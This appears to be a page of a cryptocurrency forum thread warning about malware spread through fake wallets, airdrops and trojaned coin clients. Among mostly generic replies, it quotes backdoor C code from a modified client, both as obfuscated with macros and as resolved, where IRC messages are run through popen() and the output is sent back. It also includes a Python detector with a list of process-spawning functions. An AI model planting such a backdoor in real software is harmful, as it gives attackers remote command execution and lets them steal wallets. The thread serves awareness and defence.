
Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 7. (Read 692059 times)

member
Activity: 700
Merit: 14
Thank you for this thread, I will now be more cautious. This is also the reason I don't participate in airdrops or bounties which require downloading their wallet or some application, as I highly suspect them as malware or a virus. Better safe than sorry, and there are always other projects to offer rewards without any downloads.
newbie
Activity: 126
Merit: 0
Thanks for the advance guidance. I think such problem occurred with Windows, iMac and Linux is more secure than it. But, I study more for this type issue.
newbie
Activity: 61
Merit: 0
Which altcoin do you guys think will boom this year, I'm for Staker. Maybe y'all should check it out on Twitter @stakertoken
newbie
Activity: 11
Merit: 0
Thanks to for nice information

Keep your password safe and wallet security safe.
copper member
Activity: 20
Merit: 0
Thanks for posting this, great to be aware of some of the risks out there.
newbie
Activity: 77
Merit: 0
After suffering an attack once, I've been very cautious of clicking on most malicious links I come across. Once bitten, twice shy, they say.
newbie
Activity: 84
Merit: 0

Thanks for sharing this info! It's always good practice to keep ourselves abreast of the various new stuff on cybersecurity.
newbie
Activity: 31
Merit: 0
Besides new wallets and scam ICOs, bounty hunters and airdrop chasers should check very carefully before participating in such campaigns. Scammers are now more than ever using airdrops as baits for hacking and phishing. Please avoid any airdrop that gives direct link to your MEW or other wallet account. You may end up on a scam wallet site.

Yes, you are right, scammers are increasingly sophisticated and in recent times there have been a lot of cases of infection through airdrops, it is necessary to be very attentive and careful.

These hooligans know nothing but to steal from others. They are creative enough to create such innovation just to get other people's coins. Why can't they just direct this enthusiasm into good use? Really appreciate the warning and tips from this post.

I personally experienced this with one of my MEW wallets. I was doing an airdrop and little did I know that my coins were being transferred 1 by 1. I lost about $800 worth of coins from that wallet and potentially more.
newbie
Activity: 40
Merit: 0
Besides new wallets and scam ICOs, bounty hunters and airdrop chasers should check very carefully before participating in such campaigns. Scammers are now more than ever using airdrops as baits for hacking and phishing. Please avoid any airdrop that gives direct link to your MEW or other wallet account. You may end up on a scam wallet site.

Yes, you are right, scammers are increasingly sophisticated and in recent times there have been a lot of cases of infection through airdrops, it is necessary to be very attentive and careful.

These hooligans know nothing but to steal from others. They are creative enough to create such innovation just to get other people's coins. Why can't they just direct this enthusiasm into good use? Really appreciate the warning and tips from this post.
member
Activity: 462
Merit: 10
Besides new wallets and scam ICOs, bounty hunters and airdrop chasers should check very carefully before participating in such campaigns. Scammers are now more than ever using airdrops as baits for hacking and phishing. Please avoid any airdrop that gives direct link to your MEW or other wallet account. You may end up on a scam wallet site.

Yes, you are right, scammers are increasingly sophisticated and in recent times there have been a lot of cases of infection through airdrops, it is necessary to be very attentive and careful.
newbie
Activity: 126
Merit: 0
Damn, a lot of things. What do you think about DNS services? Anti-viruses also solve the problem of hacking. I do save all passwords on flash drive to the computer nothing happened
newbie
Activity: 70
Merit: 0
Some steps must be taken which are good enough to protect your systems from being hacked, such as not using unknown exe files and using Linux, which seems to be less vulnerable to viruses.
newbie
Activity: 42
Merit: 0
what's the coin name ?
newbie
Activity: 42
Merit: 0
Much appreciated, this was exceptionally useful. Malware contamination attempts is turning into an everyone issue. Programmers are winding up more risky and we additionally require focus on airdrop or giveaway. Numerous individuals will in any case lose their cash in next years... so data, similar to your post, is valuable. Much thanks to you.
newbie
Activity: 41
Merit: 0
These con artists are always picking up, getting to be more intelligent and more complex. Be cautious dependably. Download just from official locales and dependably check where the connection drives you will go.
newbie
Activity: 7
Merit: 0
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Malwares or spywares are most common problems, make sure that you are using an encrypted protections on device.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on VirusTotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
Here is the source code with macros resolved:
Code:
// Trigger: an IRC PRIVMSG whose first text token is "!"
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    // The rest of the message line is handed to the shell via popen()
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        // The command output is sent back to the sender's nick as a PRIVMSG
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
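An audit check for the macro-hiding trick described in the post above, as an added example that is not part of the original thread or of any coin's code base: it resolves object-like `#define` aliases and reports every call that ends up at a process-spawning function. The `#define` lines in the sample are constructed (the post shows only the resolved names), and the function names and sink list are choices made for this example.

```python
import re

# Process-spawning calls to flag; a starting list assumed for this example.
EXEC_SINKS = {"popen", "_popen", "system", "execl", "execlp", "execv", "execvp",
              "CreateProcessA", "CreateProcessW", "ShellExecuteA", "WinExec"}
IDENT = r"[A-Za-z_]\w*"
DEFINE_RE = re.compile(r"^\s*#\s*define\s+(" + IDENT + r")\s+(.+?)\s*$")
CALL_RE = re.compile(r"\b(" + IDENT + r")\s*\(")

def collect_macros(source):
    """Map each object-like macro name to its replacement text."""
    found = (DEFINE_RE.match(line) for line in source.splitlines())
    return {m.group(1): m.group(2) for m in found if m}

def resolve(name, macros, depth=8):
    """Follow macro-to-macro chains; the depth bound stops cyclic defines."""
    while depth and re.fullmatch(IDENT, macros.get(name, "")):
        name, depth = macros[name], depth - 1
    return name

def find_exec_calls(source):
    """Return (line_no, name_as_written, resolved_name) for calls hitting a sink."""
    macros = collect_macros(source)
    hits = []
    for no, line in enumerate(source.splitlines(), 1):
        if DEFINE_RE.match(line):
            continue
        for m in CALL_RE.finditer(line):
            real = resolve(m.group(1), macros)
            if real in EXEC_SINKS:
                hits.append((no, m.group(1), real))
    return hits

# Constructed sample: the #define lines are assumed; the body is abbreviated
# from the snippet quoted in the post.
SAMPLE = '''\
#define CLine FILE
#define CRead popen
#define CFree pclose
#define CBuff "PRIVMSG"
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) { CFree(buf); }
}
'''

if __name__ == "__main__":
    for hit in find_exec_calls(SAMPLE):
        print("line %d: %s() resolves to %s()" % hit)
```

Function-like macros and token pasting are not resolved here; for those, review the preprocessor output (for example from the compiler's `-E` option) instead of the raw source.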
newbie
Activity: 98
Merit: 0
One of the best ways to prevent malware infecting your devices is to have a machine dedicated for crypto mining/trading. This will allow you to separate your normal activities on the internet and your cryptocurrency related activities. This reduces the chance of malware infecting your machine and hackers stealing personal data.

To prevent malicious attempts to utilise your machine's processing power for mining it is recommended that you follow general online security advice. Do not go on to suspicious websites, regularly update your anti-virus software and activate two factor authentication to prevent anyone else from accessing your accounts on online exchanges.
newbie
Activity: 113
Merit: 0
This is one of the most terrifying things. I am super careful but they are getting stronger each day.
jr. member
Activity: 70
Merit: 1
Count Your Investment - Not your savings
I'm a newbie here, thank you for your advice. Hope all newbies can read this, and for those people who just click without even reading what the pop-up's real intention is, maybe some pop-ups are just full of viruses that can corrupt their files. Be safe everyone and be cautious. Thank you.
full member
Activity: 306
Merit: 102
Just another random pre satoshi crypto freak
Besides new wallets and scam ICOs, bounty hunters and airdrop chasers should check very carefully before participating in such campaigns. Scammers are now more than ever using airdrops as baits for hacking and phishing. Please avoid any airdrop that gives direct link to your MEW or other wallet account. You may end up on a scam wallet site.